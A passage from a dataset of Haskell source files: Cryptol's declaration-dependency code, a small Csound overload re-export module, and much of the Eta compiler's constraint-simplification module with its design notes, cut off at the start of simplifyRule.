-- dependency ('namesB' yields each bind's defined and used names).
orderBinds :: [P.Bind] -> [SCC P.Bind]
orderBinds bs = mkScc [ (b, map thing defs, Set.toList uses)
                      | b <- bs
                      , let (defs,uses) = namesB b
                      ]
-- | Declarations from which we can extract value bindings and/or
-- type declarations.
class FromDecl d where
  toBind   :: d -> Maybe P.Bind
  toTyDecl :: d -> Maybe TyDecl

-- Top-level declarations: unwrap the top-level wrapper and recurse.
instance FromDecl P.TopDecl where
  toBind (P.Decl x)        = toBind (P.tlValue x)
  toBind _                 = Nothing

  toTyDecl (P.TDNewtype d) = Just (NT (P.tlValue d))
  toTyDecl (P.Decl x)      = toTyDecl (P.tlValue x)
  toTyDecl _               = Nothing

-- Ordinary declarations: look through location annotations.
instance FromDecl P.Decl where
  toBind (P.DLocated d _)   = toBind d
  toBind (P.DBind b)        = return b
  toBind _                  = Nothing

  toTyDecl (P.DLocated d _) = toTyDecl d
  toTyDecl (P.DType x)      = Just (TS x)
  toTyDecl _                = Nothing
{- | Given a list of declarations, annotated with (i) the names that they
define, and (ii) the names that they use, we compute a list of strongly
connected components of the declarations.  The SCCs are in dependency order. -}
mkScc :: [(a,[QName],[QName])] -> [SCC a]
mkScc ents = stronglyConnComp $ zipWith mkGr keys ents
  where
  keys              = [ 0 :: Integer .. ]

  -- A graph node: used names not in 'nodeMap' (defined elsewhere) are
  -- silently dropped, so only in-scope dependencies create edges.
  mkGr i (x,_,uses) = (x,i,mapMaybe (`Map.lookup` nodeMap) uses)

  -- Maps names to node ids.
  nodeMap           = Map.fromList $ concat $ zipWith mkNode keys ents
  mkNode i (_,defs,_) = [ (d,i) | d <- defs ]
{- | Combine a bunch of definitions into a single map.  Here we check
that each name is defined only once. -}
combineMaps :: [Map QName (Located a)] -> InferM (Map QName (Located a))
combineMaps ms =
  do -- report every name that occurs in more than one map
     mapM_ recordError $
       do m <- ms
          (x,rs) <- duplicates [ a { thing = x } | (x,a) <- Map.toList m ]
          return (RepeatedDefinitions x rs)
     -- left-biased union: on clashes the earlier map's entry wins
     return (Map.unions ms)

{- | Combine a bunch of definitions into a single map.  Here we check
that each name is defined only once. -}
combine :: [(QName, Located a)] -> InferM (Map QName (Located a))
combine m =
  do mapM_ recordError $
       do (x,rs) <- duplicates [ a { thing = x } | (x,a) <- m ]
          return (RepeatedDefinitions x rs)
     return (Map.fromList m)
-- | Identify multiple occurances of something.
duplicates :: Ord a => [Located a] -> [(a,[Range])]
duplicates xs = mapMaybe multiple grouped
  where
    -- sort then group, so equal payloads form adjacent runs
    grouped = groupBy ((==) `on` thing) (sortBy (compare `on` thing) xs)

    -- a run of two or more is a duplicate: report payload and all sites
    multiple ys@(y : _ : _) = Just (thing y, map srcRange ys)
    multiple _              = Nothing
| TomMD/cryptol | src/Cryptol/TypeCheck/Depends.hs | bsd-3-clause | 5,000 | 0 | 19 | 1,572 | 1,552 | 834 | 718 | 86 | 4 |
-- | Re-exports the overloading helpers: output conversion ('Outs'),
-- argument lifting ('onArg'), and the midi/amplitude/frequency
-- instrument classes.
module Csound.Control.Overload(
    Outs(..), onArg, MidiInstr(..), MidiInstrTemp(..), AmpInstr(..), CpsInstr(..)
) where

import Csound.Control.Overload.Outs
import Csound.Control.Overload.MidiInstr
import Csound.Control.Overload.SpecInstr
| silky/csound-expression | src/Csound/Control/Overload.hs | bsd-3-clause | 250 | 0 | 5 | 30 | 68 | 48 | 20 | 5 | 0 |
module Eta.TypeCheck.TcSimplify(
simplifyInfer,
quantifyPred, growThetaTyVars,
simplifyAmbiguityCheck,
simplifyDefault,
simplifyRule, simplifyTop, simplifyInteractive,
solveWantedsTcM, simplifyWantedsTcM,
tcCheckSatisfiability,
captureTopConstraints
) where
import qualified Eta.LanguageExtensions as LangExt
import Eta.TypeCheck.TcRnTypes
import Eta.TypeCheck.TcRnMonad
import qualified Eta.TypeCheck.TcRnMonad as TcRnMonad
import qualified Eta.TypeCheck.TcRnMonad as TcM
import Eta.TypeCheck.TcErrors
import Eta.TypeCheck.TcMType as TcM
import Eta.TypeCheck.TcType
import Eta.TypeCheck.TcSMonad as TcS
import Eta.TypeCheck.TcInteract
import Eta.Types.Kind ( isKind, isSubKind, defaultKind_maybe )
import Eta.TypeCheck.Inst
import Eta.Types.Type ( classifyPredType, isIPClass, PredTree(..)
, getClassPredTys_maybe, EqRel(..))
import Eta.Types.TyCon ( isTypeFamilyTyCon )
import Eta.Types.Class ( Class )
import Eta.BasicTypes.Id ( idType )
import Eta.BasicTypes.Var
import Eta.BasicTypes.Unique
import Eta.BasicTypes.VarSet
import Eta.TypeCheck.TcEvidence
import Eta.BasicTypes.Name
import Eta.Utils.Bag
import Eta.Utils.ListSetOps
import Eta.Utils.Util
import Eta.Prelude.PrelInfo
import Eta.Prelude.PrelNames
import Control.Monad ( unless )
import Eta.Types.Class ( classKey )
import Eta.BasicTypes.BasicTypes ( RuleName )
import Eta.Utils.Outputable
import Eta.Utils.FastString
import Eta.Core.TrieMap () -- DV: for now
import Data.List( partition )
{-
*********************************************************************************
* *
* External interface *
* *
*********************************************************************************
-}
captureTopConstraints :: TcM a -> TcM (a, WantedConstraints)
-- (captureTopConstraints m) runs m, and returns the type constraints it
-- generates plus the constraints produced by static forms inside.
-- If it fails with an exception, it reports any insolubles
-- (out of scope variables) before doing so
captureTopConstraints thing_inside
  = do { -- Fresh mutable cell to accumulate constraints from static forms;
         -- it is threaded through via the global environment.
         static_wc_var <- TcM.newTcRef emptyWC ;
       ; (mb_res, lie) <- TcM.updGblEnv (\env -> env { tcg_static_wc = static_wc_var } ) $
                          TcM.tryCaptureConstraints thing_inside
       ; stWC <- TcM.readTcRef static_wc_var

       -- See TcRnMonad Note [Constraints and errors]
       -- If the thing_inside threw an exception, but generated some insoluble
       -- constraints, report the latter before propagating the exception
       -- Otherwise they will be lost altogether
       ; case mb_res of
           Right res -> return (res, lie `andWC` stWC)
           Left {} -> do { _ <- reportUnsolved lie; failM } }
                -- This call to reportUnsolved is the reason
                -- this function is here instead of TcRnMonad
simplifyTop :: WantedConstraints -> TcM (Bag EvBind)
-- Simplify top-level constraints
-- Usually these will be implications,
-- but when there is nothing to quantify we don't wrap
-- in a degenerate implication, so we do that here instead
simplifyTop wanteds
  = do { traceTc "simplifyTop {" $ text "wanted = " <+> ppr wanteds
       ; ev_binds_var <- TcM.newTcEvBinds
       -- Solve (with top-level defaulting; see simpl_top), accumulating
       -- evidence bindings into ev_binds_var.
       ; zonked_final_wc <- solveWantedsTcMWithEvBinds ev_binds_var wanteds simpl_top
       ; binds1 <- TcRnMonad.getTcEvBinds ev_binds_var
       ; traceTc "End simplifyTop }" empty

       ; traceTc "reportUnsolved {" empty
       -- Report what is still unsolved; reportUnsolved may itself produce
       -- bindings (e.g. when deferring type errors to runtime).
       ; binds2 <- reportUnsolved zonked_final_wc
       ; traceTc "reportUnsolved }" empty

       ; return (binds1 `unionBags` binds2) }
simpl_top :: WantedConstraints -> TcS WantedConstraints
-- Top-level solving loop: solve, then try successive rounds of
-- defaulting (kind/tyvar defaulting, class defaulting, CallStack
-- defaulting), re-solving after each round that made progress.
-- See Note [Top-level Defaulting Plan]
simpl_top wanteds
  = do { (again, wc_first_go) <- reportUnifiedExtends $ nestTcS (solveWantedsAndDrop wanteds)
                            -- This is where the main work happens
       ; if again then simpl_top wc_first_go else try_tyvar_defaulting wc_first_go }
  where
    try_tyvar_defaulting :: WantedConstraints -> TcS WantedConstraints
    try_tyvar_defaulting wc
      | isEmptyWC wc
      = return wc
      | otherwise
      = do { free_tvs <- TcS.zonkTyVarsAndFV (tyVarsOfWC wc)
           ; let meta_tvs = varSetElems (filterVarSet isMetaTyVar free_tvs)
                   -- zonkTyVarsAndFV: the wc_first_go is not yet zonked
                   -- filter isMetaTyVar: we might have runtime-skolems in GHCi,
                   -- and we definitely don't want to try to assign to those!

           ; meta_tvs' <- mapM defaultTyVar meta_tvs   -- Has unification side effects
           ; if meta_tvs' == meta_tvs   -- No defaulting took place;
                                        -- (defaulting returns fresh vars)
             then try_class_defaulting wc
             else do { wc_residual <- nestTcS (solveWantedsAndDrop wc)
                            -- See Note [Must simplify after defaulting]
                     ; try_class_defaulting wc_residual } }

    try_class_defaulting :: WantedConstraints -> TcS WantedConstraints
    try_class_defaulting wc
      | isEmptyWC wc
      = return wc
      | otherwise  -- See Note [When to do type-class defaulting]
      = do { something_happened <- applyDefaultingRules (approximateWC wc)
                                   -- See Note [Top-level Defaulting Plan]
           ; if something_happened
             then do { wc_residual <- nestTcS (solveWantedsAndDrop wc)
                     ; try_class_defaulting wc_residual }
                  -- See Note [Overview of implicit CallStacks]
             else try_callstack_defaulting wc }

    -- Last resort: default leftover CallStack constraints to the
    -- empty call stack.
    try_callstack_defaulting :: WantedConstraints -> TcS WantedConstraints
    try_callstack_defaulting wc
      | isEmptyWC wc
      = return wc
      | otherwise
      = defaultCallStacks wc
-- | Default any remaining @CallStack@ constraints to empty @CallStack@s.
-- Walks both the simple constraints and (recursively) the wanteds of
-- every implication.
defaultCallStacks :: WantedConstraints -> TcS WantedConstraints
-- See Note [Overview of implicit CallStacks]
defaultCallStacks wanteds
  = do simples <- handle_simples (wc_simple wanteds)
       implics <- mapBagM handle_implic (wc_impl wanteds)
       return (wanteds { wc_simple = simples, wc_impl = implics })

  where

  -- Solved CallStack constraints come back as Nothing and are dropped.
  handle_simples simples
    = catBagMaybes <$> mapBagM defaultCallStack simples

  handle_implic implic = do
    wanteds <- defaultCallStacks (ic_wanted implic)
    return (implic { ic_wanted = wanteds })

  -- Solve a CallStack constraint with the empty stack; leave every
  -- other constraint untouched.
  defaultCallStack ct
    | Just _ <- isCallStackPred (ctPred ct)
    = do { solveCallStack (cc_ev ct) EvCsEmpty
         ; return Nothing }

  defaultCallStack ct
    = return (Just ct)
{-
Note [When to do type-class defaulting]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In GHC 7.6 and 7.8.2, we did type-class defaulting only if insolubleWC
was false, on the grounds that defaulting can't help solve insoluble
constraints. But if we *don't* do defaulting we may report a whole
lot of errors that would be solved by defaulting; these errors are
quite spurious because fixing the single insoluble error means that
defaulting happens again, which makes all the other errors go away.
This is jolly confusing: Trac #9033.
So it seems better to always do type-class defaulting.
However, always doing defaulting does mean that we'll do it in
situations like this (Trac #5934):
run :: (forall s. GenST s) -> Int
run = fromInteger 0
We don't unify the return type of fromInteger with the given function
type, because the latter involves foralls. So we're left with
(Num alpha, alpha ~ (forall s. GenST s) -> Int)
Now we do defaulting, get alpha := Integer, and report that we can't
match Integer with (forall s. GenST s) -> Int. That's not totally
stupid, but perhaps a little strange.
Another potential alternative would be to suppress *all* non-insoluble
errors if there are *any* insoluble errors, anywhere, but that seems
too drastic.
Note [Must simplify after defaulting]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We may have a deeply buried constraint
(t:*) ~ (a:Open)
which we couldn't solve because of the kind incompatibility, and 'a' is free.
Then when we default 'a' we can solve the constraint. And we want to do
that before starting in on type classes. We MUST do it before reporting
errors, because it isn't an error! Trac #7967 was due to this.
Note [Top-level Defaulting Plan]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
We have considered two design choices for where/when to apply defaulting.
(i) Do it in SimplCheck mode only /whenever/ you try to solve some
simple constraints, maybe deep inside the context of implications.
This used to be the case in GHC 7.4.1.
(ii) Do it in a tight loop at simplifyTop, once all other constraint has
finished. This is the current story.
Option (i) had many disadvantages:
a) First it was deep inside the actual solver,
b) Second it was dependent on the context (Infer a type signature,
or Check a type signature, or Interactive) since we did not want
to always start defaulting when inferring (though there is an exception to
this see Note [Default while Inferring])
c) It plainly did not work. Consider typecheck/should_compile/DfltProb2.hs:
f :: Int -> Bool
f x = const True (\y -> let w :: a -> a
w a = const a (y+1)
in w y)
We will get an implication constraint (for beta the type of y):
[untch=beta] forall a. 0 => Num beta
which we really cannot default /while solving/ the implication, since beta is
untouchable.
Instead our new defaulting story is to pull defaulting out of the solver loop and
go with option (ii), implemented at SimplifyTop. Namely:
- First have a go at solving the residual constraint of the whole program
- Try to approximate it with a simple constraint
- Figure out derived defaulting equations for that simple constraint
- Go round the loop again if you did manage to get some equations
Now, that has to do with class defaulting. However there exists type variable /kind/
defaulting. Again this is done at the top-level and the plan is:
- At the top-level, once you had a go at solving the constraint, do
figure out /all/ the touchable unification variables of the wanted constraints.
- Apply defaulting to their kinds
More details in Note [DefaultTyVar].
-}
------------------
-- | Solve the constraints arising from an ambiguity check on the given
-- type.  Errors are reported (not returned); with -XAllowAmbiguousTypes
-- only insoluble constraints are reported.
simplifyAmbiguityCheck :: Type -> WantedConstraints -> TcM ()
simplifyAmbiguityCheck ty wanteds
  = do { traceTc "simplifyAmbiguityCheck {" (text "type = " <+> ppr ty $$ text "wanted = " <+> ppr wanteds)
       ; ev_binds_var <- TcM.newTcEvBinds
       ; zonked_final_wc <- solveWantedsTcMWithEvBinds ev_binds_var wanteds simpl_top
       ; traceTc "End simplifyAmbiguityCheck }" empty

       -- Normally report all errors; but with -XAllowAmbiguousTypes
       -- report only insoluble ones, since they represent genuinely
       -- inaccessible code
       ; allow_ambiguous <- xoptM LangExt.AllowAmbiguousTypes
       ; traceTc "reportUnsolved(ambig) {" empty
       ; unless (allow_ambiguous && not (insolubleWC zonked_final_wc))
                (discardResult (reportUnsolved zonked_final_wc))
       ; traceTc "reportUnsolved(ambig) }" empty

       ; return () }
------------------
-- | Solve constraints from an interactive context.  Identical to
-- 'simplifyTop', plus a trace message.
simplifyInteractive :: WantedConstraints -> TcM (Bag EvBind)
simplifyInteractive wanteds
  = do { traceTc "simplifyInteractive" empty
       ; simplifyTop wanteds }
------------------
-- | Check that a @default@ declaration's instantiated constraints are
-- soluble.  Succeeds iff they are; otherwise the unsolved constraints
-- are reported as errors.
simplifyDefault :: ThetaType    -- Wanted; has no type variables in it
                -> TcM ()       -- Succeeds iff the constraint is soluble
simplifyDefault theta
  = do { -- Fixed: this trace previously said "simplifyInteractive",
         -- a copy-paste slip that made -ddump-tc-trace output misleading.
         traceTc "simplifyDefault" empty
       ; wanted <- newSimpleWanteds DefaultOrigin theta
       ; (unsolved, _binds) <- solveWantedsTcM (mkSimpleWC wanted)

       ; traceTc "reportUnsolved {" empty
       -- See Note [Deferring coercion errors to runtime]
       ; reportAllUnsolved unsolved
         -- Postcondition of solveWantedsTcM is that returned
         -- constraints are zonked. So Precondition of reportUnsolved
         -- is true.
       ; traceTc "reportUnsolved }" empty

       ; return () }
{-
*********************************************************************************
* *
* Inference
* *
***********************************************************************************
Note [Inferring the type of a let-bound variable]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Consider
f x = rhs
To infer f's type we do the following:
* Gather the constraints for the RHS with ambient level *one more than*
the current one. This is done by the call
captureConstraints (captureTcLevel (tcMonoBinds...))
in TcBinds.tcPolyInfer
* Call simplifyInfer to simplify the constraints and decide what to
quantify over. We pass in the level used for the RHS constraints,
here called rhs_tclvl.
This ensures that the implication constraint we generate, if any,
has a strictly-increased level compared to the ambient level outside
the let binding.
-}
-- | Simplify the constraints of a group of let-bound definitions whose
-- types we are inferring, and decide which type variables and
-- constraints to quantify over.  Residual constraints are emitted as an
-- implication.  See Note [Inferring the type of a let-bound variable].
simplifyInfer :: TcLevel               -- Used when generating the constraints
              -> Bool                  -- Apply monomorphism restriction
              -> [(Name, TcTauType)]   -- Variables to be generalised,
                                       -- and their tau-types
              -> WantedConstraints
              -> TcM ([TcTyVar],    -- Quantify over these type variables
                      [EvVar],      -- ... and these constraints
                      Bool,         -- The monomorphism restriction did something
                                    --   so the results type is not as general as
                                    --   it could be
                      TcEvBinds)    -- ... binding these evidence variables
simplifyInfer rhs_tclvl apply_mr name_taus wanteds
  | isEmptyWC wanteds
  -- Fast path: no constraints at all; just quantify over the free
  -- (non-global) type variables of the tau-types.
  = do { gbl_tvs <- tcGetGlobalTyVars
       ; qtkvs <- quantifyTyVars gbl_tvs (tyVarsOfTypes (map snd name_taus))
       ; traceTc "simplifyInfer: empty WC" (ppr name_taus $$ ppr qtkvs)
       ; return (qtkvs, [], False, emptyTcEvBinds) }

  | otherwise
  = do { traceTc "simplifyInfer {" $ vcat
             [ ptext (sLit "binds =") <+> ppr name_taus
             , ptext (sLit "rhs_tclvl =") <+> ppr rhs_tclvl
             , ptext (sLit "apply_mr =") <+> ppr apply_mr
             , ptext (sLit "(unzonked) wanted =") <+> ppr wanteds
             ]

              -- Historical note: Before step 2 we used to have a
              -- HORRIBLE HACK described in Note [Avoid unecessary
              -- constraint simplification] but, as described in Trac
              -- #4361, we have taken it out now.  That's why we start
              -- with step 2!

              -- Step 2) First try full-blown solving

              -- NB: we must gather up all the bindings from doing
              -- this solving; hence (runTcSWithEvBinds ev_binds_var).
              -- And note that since there are nested implications,
              -- calling solveWanteds will side-effect their evidence
              -- bindings, so we can't just revert to the input
              -- constraint.

       ; ev_binds_var <- TcM.newTcEvBinds
       ; wanted_transformed_incl_derivs <- setTcLevel rhs_tclvl $
                          runTcSWithEvBinds ev_binds_var (solveWanteds wanteds)
       -- Deliberate shadowing: zonk the result before inspecting it.
       ; wanted_transformed_incl_derivs <- zonkWC wanted_transformed_incl_derivs

              -- Step 4) Candidates for quantification are an approximation of wanted_transformed
              -- NB: Already the fixpoint of any unifications that may have happened
              -- NB: We do not do any defaulting when inferring a type, this can lead
              -- to less polymorphic types, see Note [Default while Inferring]

       ; tc_lcl_env <- TcRnMonad.getLclEnv
       ; null_ev_binds_var <- TcM.newTcEvBinds
       ; let wanted_transformed = dropDerivedWC wanted_transformed_incl_derivs
       ; quant_pred_candidates   -- Fully zonked
           <- if insolubleWC wanted_transformed_incl_derivs
              then return []   -- See Note [Quantification with errors]
                               -- NB: must include derived errors in this test,
                               --     hence "incl_derivs"

              else do { let quant_cand = approximateWC wanted_transformed
                            meta_tvs = filter isMetaTyVar (varSetElems (tyVarsOfCts quant_cand))
                      ; gbl_tvs <- tcGetGlobalTyVars
                            -- Minimise quant_cand.  We are not interested in any evidence
                            -- produced, because we are going to simplify wanted_transformed
                            -- again later. All we want here is the predicates over which to
                            -- quantify.
                            --
                            -- If any meta-tyvar unifications take place (unlikely), we'll
                            -- pick that up later.

                      ; WC { wc_simple = simples }
                           <- setTcLevel rhs_tclvl $
                              runTcSWithEvBinds null_ev_binds_var $
                              do { mapM_ (promoteAndDefaultTyVar rhs_tclvl gbl_tvs) meta_tvs
                                     -- See Note [Promote _and_ default when inferring]
                                 ; solveSimpleWanteds quant_cand }

                      ; return [ ctEvPred ev | ct <- bagToList simples
                                             , let ev = ctEvidence ct
                                             , isWanted ev ] }

         -- NB: quant_pred_candidates is already the fixpoint of any
         --     unifications that may have happened

       ; zonked_taus <- mapM (TcM.zonkTcType . snd) name_taus
       ; let zonked_tau_tvs = tyVarsOfTypes zonked_taus
       -- Decide what to promote and what to quantify over.
       ; (promote_tvs, qtvs, bound, mr_bites) <- decideQuantification apply_mr quant_pred_candidates zonked_tau_tvs

       ; outer_tclvl <- TcRnMonad.getTcLevel
       ; runTcSWithEvBinds null_ev_binds_var $ -- runTcS just to get the types right :-(
         mapM_ (promoteTyVar outer_tclvl) (varSetElems promote_tvs)

       ; let minimal_simple_preds = mkMinimalBySCs bound
             -- See Note [Minimize by Superclasses]
             skol_info = InferSkol [ (name, mkSigmaTy [] minimal_simple_preds ty)
                                   | (name, ty) <- name_taus ]
             -- Don't add the quantified variables here, because
             -- they are also bound in ic_skols and we want them to be
             -- tidied uniformly

       ; minimal_bound_ev_vars <- mapM TcM.newEvVar minimal_simple_preds
       -- Wrap the residual constraints in an implication, given the
       -- quantified constraints, and emit it for later solving.
       ; let implic = Implic { ic_tclvl = rhs_tclvl
                             , ic_skols = qtvs
                             , ic_no_eqs = False
                             , ic_given = minimal_bound_ev_vars
                             , ic_wanted = wanted_transformed
                             , ic_insol = False
                             , ic_binds = ev_binds_var
                             , ic_info = skol_info
                             , ic_env = tc_lcl_env }
       ; emitImplication implic

       ; traceTc "} simplifyInfer/produced residual implication for quantification" $
         vcat [ ptext (sLit "quant_pred_candidates =") <+> ppr quant_pred_candidates
              , ptext (sLit "zonked_taus") <+> ppr zonked_taus
              , ptext (sLit "zonked_tau_tvs=") <+> ppr zonked_tau_tvs
              , ptext (sLit "promote_tvs=") <+> ppr promote_tvs
              , ptext (sLit "bound =") <+> ppr bound
              , ptext (sLit "minimal_bound =") <+> vcat [ ppr v <+> dcolon <+> ppr (idType v)
                                                        | v <- minimal_bound_ev_vars]
              , ptext (sLit "mr_bites =") <+> ppr mr_bites
              , ptext (sLit "qtvs =") <+> ppr qtvs
              , ptext (sLit "implic =") <+> ppr implic ]

       ; return ( qtvs, minimal_bound_ev_vars
                , mr_bites, TcEvBinds ev_binds_var) }
{-
************************************************************************
* *
Quantification
* *
************************************************************************
Note [Deciding quantification]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If the monomorphism restriction does not apply, then we quantify as follows:
* Take the global tyvars, and "grow" them using the equality constraints
E.g. if x:alpha is in the environment, and alpha ~ [beta] (which can
happen because alpha is untouchable here) then do not quantify over
beta
These are the mono_tvs
* Take the free vars of the tau-type (zonked_tau_tvs) and "grow" them
using all the constraints, but knocking out the mono_tvs
The result is poly_qtvs, which we will quantify over.
* Filter the constraints using quantifyPred and the poly_qtvs
If the MR does apply, mono_tvs includes all the constrained tyvars,
and the quantified constraints are empty.
-}
-- | Decide which type variables to promote and which variables and
-- predicates to quantify over, depending on whether the monomorphism
-- restriction applies.
decideQuantification :: Bool -> [PredType] -> TcTyVarSet
                     -> TcM ( TcTyVarSet      -- Promote these
                            , [TcTyVar]       -- Do quantify over these
                            , [PredType]      -- and these
                            , Bool )          -- Did the MR bite?
-- See Note [Deciding quantification]
decideQuantification apply_mr constraints zonked_tau_tvs
  | apply_mr     -- Apply the Monomorphism restriction
  -- MR case: constrained variables are monomorphic; quantify over no
  -- predicates at all.
  = do { gbl_tvs <- tcGetGlobalTyVars
       ; let mono_tvs = gbl_tvs `unionVarSet` constrained_tvs
             -- The MR "bites" iff it stops us generalising a tau tyvar.
             mr_bites = constrained_tvs `intersectsVarSet` zonked_tau_tvs
             promote_tvs = constrained_tvs `unionVarSet` (zonked_tau_tvs `intersectVarSet` gbl_tvs)
       ; qtvs <- quantifyTyVars mono_tvs zonked_tau_tvs
       ; traceTc "decideQuantification 1" (vcat [ppr constraints, ppr gbl_tvs, ppr mono_tvs, ppr qtvs])
       ; return (promote_tvs, qtvs, [], mr_bites) }

  | otherwise
  -- No MR: grow the mono/poly sets through the constraints, then keep
  -- the predicates that mention a quantified variable.
  = do { gbl_tvs <- tcGetGlobalTyVars
       ; let mono_tvs = growThetaTyVars (filter isEqPred constraints) gbl_tvs
             poly_qtvs = growThetaTyVars constraints zonked_tau_tvs
                         `minusVarSet` mono_tvs
             theta = filter (quantifyPred poly_qtvs) constraints
             promote_tvs = mono_tvs `intersectVarSet` (constrained_tvs `unionVarSet` zonked_tau_tvs)
       ; qtvs <- quantifyTyVars mono_tvs poly_qtvs
       ; traceTc "decideQuantification 2" (vcat [ppr constraints, ppr gbl_tvs, ppr mono_tvs, ppr poly_qtvs, ppr qtvs, ppr theta])
       ; return (promote_tvs, qtvs, theta, False) }
  where
    constrained_tvs = tyVarsOfTypes constraints
------------------
-- | Should we quantify over this predicate, given the set of variables
-- we are quantifying over?
quantifyPred :: TyVarSet           -- Quantifying over these
             -> PredType -> Bool   -- True <=> quantify over this wanted
quantifyPred qtvs pred
  = case classifyPredType pred of
      ClassPred cls tys
         | isIPClass cls -> True  -- See note [Inheriting implicit parameters]
         | otherwise     -> tyVarsOfTypes tys `intersectsVarSet` qtvs

      EqPred NomEq ty1 ty2  -> quant_fun ty1 || quant_fun ty2

      -- representational equality is like a class constraint
      EqPred ReprEq ty1 ty2 -> tyVarsOfTypes [ty1, ty2] `intersectsVarSet` qtvs

      IrredPred ty -> tyVarsOfType ty `intersectsVarSet` qtvs
      TuplePred {} -> False
  where
    -- Only quantify over (F tys ~ ty) if tys mentions a quantified variable
    -- In particular, quantifying over (F Int ~ ty) is a bit like quantifying
    -- over (Eq Int); the instance should kick in right here
    quant_fun ty
      = case tcSplitTyConApp_maybe ty of
          Just (tc, tys) | isTypeFamilyTyCon tc
                         -> tyVarsOfTypes tys `intersectsVarSet` qtvs
          _ -> False
------------------
-- | Extend a set of type variables with every variable reachable from it
-- through the given constraints, to a fixed point.
-- See Note [Growing the tau-tvs using constraints].
growThetaTyVars :: ThetaType -> TyVarSet -> TyVarSet
growThetaTyVars theta tvs
  | null theta             = tvs
  | isEmptyVarSet seed_tvs = tvs
  | otherwise              = fixVarSet grow_all seed_tvs
  where
    (ips, non_ips) = partition isIPPred theta

    -- Variables of implicit-parameter constraints always go in.
    -- See note [Inheriting implicit parameters]
    seed_tvs = tvs `unionVarSet` tyVarsOfTypes ips

    -- One growth step: absorb the variables of every (non-IP)
    -- constraint that already touches the set; 'fixVarSet' iterates
    -- this to a fixed point.
    grow_all acc = foldr grow_one acc non_ips

    grow_one pred acc
      | pred_tvs `intersectsVarSet` acc = acc `unionVarSet` pred_tvs
      | otherwise                       = acc
      where
        pred_tvs = tyVarsOfType pred
{-
Note [Growing the tau-tvs using constraints]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(growThetaTyVars insts tvs) is the result of extending the set
of tyvars tvs using all conceivable links from pred
E.g. tvs = {a}, preds = {H [a] b, K (b,Int) c, Eq e}
Then growThetaTyVars preds tvs = {a,b,c}
Notice that
growThetaTyVars is conservative if v might be fixed by vs
=> v `elem` grow(vs,C)
Note [Inheriting implicit parameters]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Consider this:
f x = (x::Int) + ?y
where f is *not* a top-level binding.
From the RHS of f we'll get the constraint (?y::Int).
There are two types we might infer for f:
f :: Int -> Int
(so we get ?y from the context of f's definition), or
f :: (?y::Int) => Int -> Int
At first you might think the first was better, because then
?y behaves like a free variable of the definition, rather than
having to be passed at each call site. But of course, the WHOLE
IDEA is that ?y should be passed at each call site (that's what
dynamic binding means) so we'd better infer the second.
BOTTOM LINE: when *inferring types* you must quantify over implicit
parameters, *even if* they don't mention the bound type variables.
Reason: because implicit parameters, uniquely, have local instance
declarations. See the predicate quantifyPred.
Note [Quantification with errors]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If we find that the RHS of the definition has some absolutely-insoluble
constraints, we abandon all attempts to find a context to quantify
over, and instead make the function fully-polymorphic in whatever
type we have found. For two reasons
a) Minimise downstream errors
b) Avoid spurious errors from this function
But NB that we must include *derived* errors in the check. Example:
(a::*) ~ Int#
We get an insoluble derived error *~#, and we don't want to discard
it before doing the isInsolubleWC test! (Trac #8262)
Note [Default while Inferring]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Our current plan is that defaulting only happens at simplifyTop and
not simplifyInfer. This may lead to some insoluble deferred constraints
Example:
instance D g => C g Int b
constraint inferred = (forall b. 0 => C gamma alpha b) /\ Num alpha
type inferred = gamma -> gamma
Now, if we try to default (alpha := Int) we will be able to refine the implication to
(forall b. 0 => C gamma Int b)
which can then be simplified further to
(forall b. 0 => D gamma)
Finally we /can/ approximate this implication with (D gamma) and infer the quantified
type: forall g. D g => g -> g
Instead what will currently happen is that we will get a quantified type
(forall g. g -> g) and an implication:
forall g. 0 => (forall b. 0 => C g alpha b) /\ Num alpha
which, even if the simplifyTop defaults (alpha := Int) we will still be left with an
unsolvable implication:
forall g. 0 => (forall b. 0 => D g)
The concrete example would be:
h :: C g a s => g -> a -> ST s a
f (x::gamma) = (\_ -> x) (runST (h x (undefined::alpha)) + 1)
But it is quite tedious to do defaulting and resolve the implication constraints and
we have not observed code breaking because of the lack of defaulting in inference so
we don't do it for now.
Note [Minimize by Superclasses]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
When we quantify over a constraint, in simplifyInfer we need to
quantify over a constraint that is minimal in some sense: For
instance, if the final wanted constraint is (Eq alpha, Ord alpha),
we'd like to quantify over Ord alpha, because we can just get Eq alpha
from superclass selection from Ord alpha. This minimization is what
mkMinimalBySCs does. Then, simplifyInfer uses the minimal constraint
to check the original wanted.
Note [Avoid unecessary constraint simplification]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------- NB NB NB (Jun 12) -------------
This note not longer applies; see the notes with Trac #4361.
But I'm leaving it in here so we remember the issue.)
----------------------------------------
When inferring the type of a let-binding, with simplifyInfer,
try to avoid unnecessarily simplifying class constraints.
Doing so aids sharing, but it also helps with delicate
situations like
instance C t => C [t] where ..
f :: C [t] => ....
f x = let g y = ...(constraint C [t])...
in ...
When inferring a type for 'g', we don't want to apply the
instance decl, because then we can't satisfy (C t). So we
just notice that g isn't quantified over 't' and partition
the constraints before simplifying.
This only half-works, but then let-generalisation only half-works.
*********************************************************************************
* *
* RULES *
* *
***********************************************************************************
See note [Simplifying RULE constraints] in TcRule
Note [RULE quantification over equalities]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Deciding which equalities to quantify over is tricky:
* We do not want to quantify over insoluble equalities (Int ~ Bool)
(a) because we prefer to report a LHS type error
(b) because if such things end up in 'givens' we get a bogus
"inaccessible code" error
* But we do want to quantify over things like (a ~ F b), where
F is a type function.
The difficulty is that it's hard to tell what is insoluble!
So we see whether the simplification step yielded any type errors,
and if so refrain from quantifying over *any* equalities.
-}
-- | Simplify the constraints of a RULE, returning the LHS evidence
-- variables to quantify the rule over, plus the residual (unquantified)
-- LHS constraints.
simplifyRule :: RuleName
